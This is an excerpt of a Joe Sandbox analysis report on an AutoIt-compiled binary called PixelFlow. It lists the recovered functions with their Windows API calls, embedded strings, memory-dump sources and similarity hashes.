Instruction Fuzzy Hash: 63113075E01228BFDB108F959C44FAFBBBDEB45B60F104156F904E7290D6715A018BA1

Function 00664D89 Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00664DB2
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00664DC9
FreeSid.ADVAPI32(?), ref: 00664DD9

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: d663efb0e69a3bb985575acba6471300f2fa45968e6c5648f9be229b5d6de2c3
Instruction ID: 3aa7c50bf75644eed35170a52d4d904c594b458453b29fa1ab857ae563700f88
Opcode Fuzzy Hash: d663efb0e69a3bb985575acba6471300f2fa45968e6c5648f9be229b5d6de2c3
Instruction Fuzzy Hash: 3FF04F7591130DBFEF00DFE0DC89AEDB7BDEF08201F104469A501E2580D6305A448B50

Function 00661932 Relevance: 3.0, APIs: 2, Instructions: 32keyboardCOMMON

Download Yara Rule

APIs

SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0066196D
keybd_event.USER32(?,75C0C0D0,?,00000000), ref: 00661980

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: InputSendkeybd_event
String ID:
API String ID: 3536248340-0
Opcode ID: 2b6d25ce3f9eab1429a7557bc8577fbba5f8bd49f736ec00ca65069f6b532c0f
Instruction ID: 94ab2387ff0aedaac74c53b9def60e22163bf6d205c0d832aabf452c361ecbad
Opcode Fuzzy Hash: 2b6d25ce3f9eab1429a7557bc8577fbba5f8bd49f736ec00ca65069f6b532c0f
Instruction Fuzzy Hash: 63F0497190020DAFEB00CF94C805BFEBBB5EF04315F00814AF9559A291C3799615DF94

Function 0066A51A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,0067991A,?,0069098C,?), ref: 0066A547
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,0067991A,?,0069098C,?), ref: 0066A559

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: a5a8c0139fc9084ce43acec30dd84f3f7f4fbe3a8dece4ca9b1f1c5c0e66077e
Instruction ID: 3c0c7388eca918ff361b1a78d077f3e64e3562a931217f57a224e9b46a86c66c
Opcode Fuzzy Hash: a5a8c0139fc9084ce43acec30dd84f3f7f4fbe3a8dece4ca9b1f1c5c0e66077e
Instruction Fuzzy Hash: C4F0823551522DAFDB20EFA4CC48FEA776EAF09361F008156B909D6181D6309A40CBA1

Function 00658BCC Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00658D0A), ref: 00658BE1
CloseHandle.KERNEL32(?,?,00658D0A), ref: 00658BF3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: febc1f1211832e73da6a135992089c5ab51f6c546953fc350cec293f5f08f664
Instruction ID: 572770f85b09cf3e1f0f22cbd5e588081e0da04eced6f900507db34813edac16
Opcode Fuzzy Hash: febc1f1211832e73da6a135992089c5ab51f6c546953fc350cec293f5f08f664
Instruction Fuzzy Hash: 47E08672004610AFF7612F11FC05DB77BAEEF04311B10851EF85581831CB315C90DB50

Function 0062A2B5 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,0000FFFF,00628EB7,0000FCD7,?,?,00000001), ref: 0062A2BA
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0062A2C3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: dc9adbdc8c42e4324ab0f2ba19b88cf96476175ddfb75c563bb22aaaee52812c
Instruction ID: 0622b6430dcbc5b0978859e9f260ccb073eadeaeecd8afcd5e68b3b30b4d1fee
Opcode Fuzzy Hash: dc9adbdc8c42e4324ab0f2ba19b88cf96476175ddfb75c563bb22aaaee52812c
Instruction Fuzzy Hash: 49B09232064209EFEB402FA1EC09B883F6EEB44B62F005012F61D44860CF6254508A91

Function 006743B9 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON

Download Yara Rule

APIs

BlockInput.USER32(00000001), ref: 006743D4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BlockInput
String ID:
API String ID: 3456056419-0
Opcode ID: 72fe55d9ad0a8910877e6cae38ddf05b9e0b92d4d8f1629b23c5f7214be0a09b
Instruction ID: b2b392fd4c41c58362a9ee5db1785d655f70687f81ad147601b40e37b527c53e
Opcode Fuzzy Hash: 72fe55d9ad0a8910877e6cae38ddf05b9e0b92d4d8f1629b23c5f7214be0a09b
Instruction Fuzzy Hash: 06E01A712402059FD710AF5AE804A9BB7EAAF94760F10C41AF94AD7791DFB0AC518B94

Function 0066507B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0066509E

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: mouse_event
String ID:
API String ID: 2434400541-0
Opcode ID: 21dbf8a765e0b3906484d9435aaa0fb6c481fa484e7ac30203781a57953dcb1d
Instruction ID: 81724c12791817ffe5a5236a78d22f1f91600f3db5adac122dc0a160eadc35cd
Opcode Fuzzy Hash: 21dbf8a765e0b3906484d9435aaa0fb6c481fa484e7ac30203781a57953dcb1d
Instruction Fuzzy Hash: A9D052A0220B047CFC780B30CC1BFBA120BF3807D2FD4228A33078A2C4A8E0E801A0B1

Function 0065914C Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00658D8A), ref: 0065916C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: LogonUser
String ID:
API String ID: 1244722697-0
Opcode ID: 29b828ee4150df49c2c776f5c75a018268a6065901671076e1d7040b9a7667d3
Instruction ID: eae93acf9f1b6961717d1326d17f552017edf382e7524d4bb6cbe94c39f10206
Opcode Fuzzy Hash: 29b828ee4150df49c2c776f5c75a018268a6065901671076e1d7040b9a7667d3
Instruction Fuzzy Hash: 16D05E3226450EAFEF018EA4DC01EAE3B6AEB04B01F408111FE15C50A0C775D835AB60

Function 00640652 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?), ref: 00640664

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 386c66e0b0119fcbe9d2ba906050fc2e3e7c7bb4ee38788902e6a78df37c974e
Instruction ID: fed98a5513888a3dba030dbb12b027b41f15447ca31c41cd8370dfafa4768a33
Opcode Fuzzy Hash: 386c66e0b0119fcbe9d2ba906050fc2e3e7c7bb4ee38788902e6a78df37c974e
Instruction Fuzzy Hash: 96C048F2C00119DBDB05DFA0DA88EEEB7BDAB08304F20006AA502F2100D7789B448AB1

Function 0062A284 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(?), ref: 0062A28A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: e15dda7b32cca3bf92c438a5e2f6bbfa8e7e261509be18a52e68162934c22f57
Instruction ID: 5bab3dbb5fe03bd679f6dca50f91949d1ba4eba23edeac46281a5adcec1ef5f6
Opcode Fuzzy Hash: e15dda7b32cca3bf92c438a5e2f6bbfa8e7e261509be18a52e68162934c22f57
Instruction Fuzzy Hash: B3A0223002020CFFCF002FA2FC08888BFAEEB002A0B008022F80C00832CF33A8208AC0

Function 00677CB8 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00677D0D
DeleteObject.GDI32(00000000), ref: 00677D1F
DestroyWindow.USER32 ref: 00677D2D
GetDesktopWindow.USER32 ref: 00677D47
GetWindowRect.USER32(00000000), ref: 00677D4E
SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00677E8F
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00677E9F
CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677EE7
GetClientRect.USER32(00000000,?), ref: 00677EF3
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00677F2D
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F4F
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F62
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F6D
GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F76
ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F85
GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F8E
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677F95
GlobalFree.KERNEL32(00000000), ref: 00677FA0
CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00677FB2
OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00693C7C,00000000), ref: 00677FC8
GlobalFree.KERNEL32(00000000), ref: 00677FD8
CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00677FFE
SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0067801D
SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067803F
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0067822C

Strings

, xrefs: 006781B2
AutoIt v3, xrefs: 00677EDF
static, xrefs: 00677F27, 0067807E
DISPLAY, xrefs: 0067808F

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 4fbcaeb77b2080a20b936f3f83ff336d26233292cb79bac4e702fefd109790ae
Instruction ID: e29fcafeed1c9c7f4c7f5c9388366a5648c1dfbbe61d6201788b310a844bb074
Opcode Fuzzy Hash: 4fbcaeb77b2080a20b936f3f83ff336d26233292cb79bac4e702fefd109790ae
Instruction Fuzzy Hash: D2025B71900115EFDB14DFA4DD89EAE7BBAEF48310F048159F91AAB2A1CB74AD01CB60

Function 00683971 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,00690980), ref: 00683A2D
IsWindowVisible.USER32(?), ref: 00683A51

Strings

DELSTRING, xrefs: 00683B4F
ISCHECKED, xrefs: 00683C3F
GETCURRENTSELECTION, xrefs: 00683BE9
TABRIGHT, xrefs: 00683AA3
UNCHECK, xrefs: 00683C89
SELECTSTRING, xrefs: 00683C0C
CURRENTTAB, xrefs: 00683AC3
GETSELECTED, xrefs: 00683CA9
ISENABLED, xrefs: 00683A71
HIDEDROPDOWN, xrefs: 00683B06
TABLEFT, xrefs: 00683A8D
SETCURRENTSELECTION, xrefs: 00683BBC
GETLINECOUNT, xrefs: 00683CCC
GETLINE, xrefs: 00683DA1
CHECK, xrefs: 00683C73
ISVISIBLE, xrefs: 00683A3D
SHOWDROPDOWN, xrefs: 00683AE6
ADDSTRING, xrefs: 00683B1C
EDITPASTE, xrefs: 00683D65
GETCURRENTCOL, xrefs: 00683D2E
SENDCOMMANDID, xrefs: 00683DE0
GETCURRENTLINE, xrefs: 00683CF3
FINDSTRING, xrefs: 00683B7C

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 18758a012db2fe063e0a91d480e96d94e6b112a969e0ac0b90ff43fbfac75c23
Instruction ID: 2da25fd8174f2ad89036a440da3e284362c617fc8b9416bbe944fca9056c0742
Opcode Fuzzy Hash: 18758a012db2fe063e0a91d480e96d94e6b112a969e0ac0b90ff43fbfac75c23
Instruction Fuzzy Hash: 3BD1B3B0204211ABCB58FF10C451AAE7BA7AF94740F44465CF8965B3E3CB71DE4ACB96

Function 0068A9C7 Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0068AA1D
GetSysColorBrush.USER32(0000000F), ref: 0068AA4E
GetSysColor.USER32(0000000F), ref: 0068AA5A
SetBkColor.GDI32(?,000000FF), ref: 0068AA74
SelectObject.GDI32(?,00000000), ref: 0068AA83
InflateRect.USER32(?,000000FF,000000FF), ref: 0068AAAE
GetSysColor.USER32(00000010), ref: 0068AAB6
CreateSolidBrush.GDI32(00000000), ref: 0068AABD
FrameRect.USER32(?,?,00000000), ref: 0068AACC
DeleteObject.GDI32(00000000), ref: 0068AAD3
InflateRect.USER32(?,000000FE,000000FE), ref: 0068AB1E
FillRect.USER32(?,?,00000000), ref: 0068AB50
GetWindowLongW.USER32(?,000000F0), ref: 0068AB7B

Part of subcall function 0068ACB7: GetSysColor.USER32(00000012), ref: 0068ACF0
Part of subcall function 0068ACB7: SetTextColor.GDI32(?,?), ref: 0068ACF4
Part of subcall function 0068ACB7: GetSysColorBrush.USER32(0000000F), ref: 0068AD0A
Part of subcall function 0068ACB7: GetSysColor.USER32(0000000F), ref: 0068AD15
Part of subcall function 0068ACB7: GetSysColor.USER32(00000011), ref: 0068AD32
Part of subcall function 0068ACB7: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0068AD40
Part of subcall function 0068ACB7: SelectObject.GDI32(?,00000000), ref: 0068AD51
Part of subcall function 0068ACB7: SetBkColor.GDI32(?,00000000), ref: 0068AD5A
Part of subcall function 0068ACB7: SelectObject.GDI32(?,?), ref: 0068AD67
Part of subcall function 0068ACB7: InflateRect.USER32(?,000000FF,000000FF), ref: 0068AD86
Part of subcall function 0068ACB7: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0068AD9D
Part of subcall function 0068ACB7: GetWindowLongW.USER32(00000000,000000F0), ref: 0068ADB2
Part of subcall function 0068ACB7: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0068ADDA

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: e922965feca5df77d77446c9838b2ffb656190d26146048ba7a43127c85a1424
Instruction ID: 6d2ed3be7ad057eebb870b7dae1194eacf0e7f18507b8deb6f7ca23421849b49
Opcode Fuzzy Hash: e922965feca5df77d77446c9838b2ffb656190d26146048ba7a43127c85a1424
Instruction Fuzzy Hash: 4E918F72008301BFE711AFA4DD08E6B7BAAFF88320F105B1AF952965A1D771D945CF52

Function 00602FE8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00603072
DeleteObject.GDI32(00000000), ref: 006030B8
DeleteObject.GDI32(00000000), ref: 006030C3
DestroyIcon.USER32(00000000,?,?,?), ref: 006030CE
DestroyWindow.USER32(00000000,?,?,?), ref: 006030D9
SendMessageW.USER32(?,00001308,?,00000000), ref: 0063C6AC
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0063C6E5
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0063CB0E

Part of subcall function 00601F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00602412,?,00000000,?,?,?,?,00601AA7,00000000,?), ref: 00601F76

SendMessageW.USER32(?,00001053), ref: 0063CB4B
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0063CB62
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063CB78
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0063CB83

Strings

0, xrefs: 0063C9A2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 0d7163a7b84a19d3f840df881accba71f94a2c397ac593a191d4fa144437d421
Instruction ID: ac83eb6ffe1d921cfffcaf103a2468d6ba919aa510644d997b9cc3040c13b5b8
Opcode Fuzzy Hash: 0d7163a7b84a19d3f840df881accba71f94a2c397ac593a191d4fa144437d421
Instruction Fuzzy Hash: 02128030601211EFDB25CF24C895BA6BBAABF04321F144569F956EB7A2C731ED42CF91

Function 006127FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON

Download Yara Rule

APIs

Part of subcall function 00620F16: std::exception::exception.LIBCMT ref: 00620F4C
Part of subcall function 00620F16: __CxxThrowException@8.LIBCMT ref: 00620F61

__wcsnicmp.LIBCMT ref: 0061286A
__wcsnicmp.LIBCMT ref: 0061287E
__wcsnicmp.LIBCMT ref: 00612896
__wcsnicmp.LIBCMT ref: 006128AE
__wcsnicmp.LIBCMT ref: 006128C6
__wcsnicmp.LIBCMT ref: 006128DE
__wcsnicmp.LIBCMT ref: 006128F6
__wcsnicmp.LIBCMT ref: 0061290A
__wcsnicmp.LIBCMT ref: 00612948
__wcsnicmp.LIBCMT ref: 0061295C
__wcsnicmp.LIBCMT ref: 00612970
__wcsnicmp.LIBCMT ref: 00612984

Strings

Cannot parse #include, xrefs: 0064FC65
#include, xrefs: 006128D8
#requireadmin, xrefs: 00612890
#notrayicon, xrefs: 00612878
#ce, xrefs: 0061297E
#OnAutoItStartRegister, xrefs: 006128A8
Bad directive syntax error, xrefs: 0064FB53, 0064FB70
#comments-start, xrefs: 006128F0, 00612942
#cs, xrefs: 00612904, 00612956
', xrefs: 0064FB1F
", xrefs: 0064FB09
Unterminated group of comments, xrefs: 0064FC7A
#pragma compile, xrefs: 00612864
#comments-end, xrefs: 0061296A
#include-once, xrefs: 006128C0

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
